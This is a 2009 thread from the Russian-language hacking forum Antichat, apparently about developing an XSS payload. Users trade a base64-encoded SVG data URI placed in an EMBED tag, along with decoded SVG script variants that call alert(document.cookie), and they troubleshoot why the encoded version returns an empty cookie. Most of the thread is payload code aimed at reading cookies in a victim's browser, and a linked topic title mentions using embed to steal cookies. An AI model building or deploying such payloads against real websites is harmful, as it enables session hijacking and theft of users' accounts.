HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Алерт и embed
  #1  
Старый 14.03.2009, 14:31
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами: 9510146

Репутация: 1550


По умолчанию Алерт и embed

Имется такой код:
Код:
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjxzY3JpcHQgdHlwZT0idGV4dC9lY21hc2NyaXB0Ij5hbGVydCgiQW50aUNoYXQiKTwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
Вставляю его на сайт, он алертом выводит "AntiChat".
Меняю код на
Код:
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjxzY3JpcHQgdHlwZT0idGV4dC9lY21hc2NyaXB0Ij5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+PC9zdmc+" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
Он должен алертом выводить куки, но выводит пустую строку, хотя куки точно есть. Что я делаю не так, как вывести куки?
 
Ответить с цитированием

  #2  
Старый 14.03.2009, 14:54
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

У меня всё выводит:

2 вариант:
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="0" height="0"><script type="text/ecmascript">alert(document.cookie)</script></svg>

1-м вариант:

<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="0" height="0"><script type="text/ecmascript">alert("AntiChat")</script></svg>

вывод алерта по первому варианту:

txtMainTab=Timeline; chkSliderOptionsPanel=true
 
Ответить с цитированием

  #3  
Старый 14.03.2009, 15:01
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами: 9510146

Репутация: 1550


По умолчанию

Цитата:
Сообщение от Pashkela  
У меня всё выводит:
просто
Код:
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="0" height="0"><script type="text/ecmascript">alert(document.cookie)</script></svg>
у меня выводит куки, а мне надо запихать это в embed, как я и показал во втором варианте, но так, чтобы он куки показывал, а не пустую строку....
 
Ответить с цитированием

  #4  
Старый 14.03.2009, 15:34
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами: 9510146

Репутация: 1550


По умолчанию

Если зайти на любой сайт, где установлены куки, и ввести в поле для урла
Код:
data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjxzY3JpcHQgdHlwZT0idGV4dC9lY21hc2NyaXB0Ij5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+PC9zdmc+
, то должен выскочить алерт с куками. А выскакивает пустой алерт =(
Всю голову уже поломал)
 
Ответить с цитированием

  #5  
Старый 14.03.2009, 15:45
Deathdreams
Постоянный
Регистрация: 08.11.2008
Сообщений: 498
С нами: 9213376

Репутация: 278
По умолчанию

попробуй поставь сразу,после:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
Pashkela правильно сказал,все выводит
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="0" height="0"><script type="text/ecmascript">alert(document.cookie)</script></svg>
 
Ответить с цитированием

  #6  
Старый 14.03.2009, 15:48
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами: 9510146

Репутация: 1550


По умолчанию

Цитата:
Сообщение от Deathdreams  
попробуй поставь сразу,после:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
Pashkela правильно сказал,все выводит
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="0" height="0"><script type="text/ecmascript">alert(document.cookie)</script></svg>
Да, если писать на страницу в раскодированном виде (как ты напсиал), то да, выводятся куки. А если закодировать и вставить в ембед (как мне надо) - то не выводятся куки. В этом-то и трабла!
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
использование тега embed для угона cookies ? ickhz Уязвимости 13 29.12.2008 17:05
Алерт есть. Как закодироровать сниф в String.fromCharCode. m2infect Уязвимости CMS / форумов 2 30.06.2006 03:12
Баги на сайтах. D1mOn Уязвимости 295 27.06.2006 22:30
XSS в Gmail.ru (алерт в адресной книге) _kREveDKo_ Уязвимости Mail-сервис 0 14.04.2006 22:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.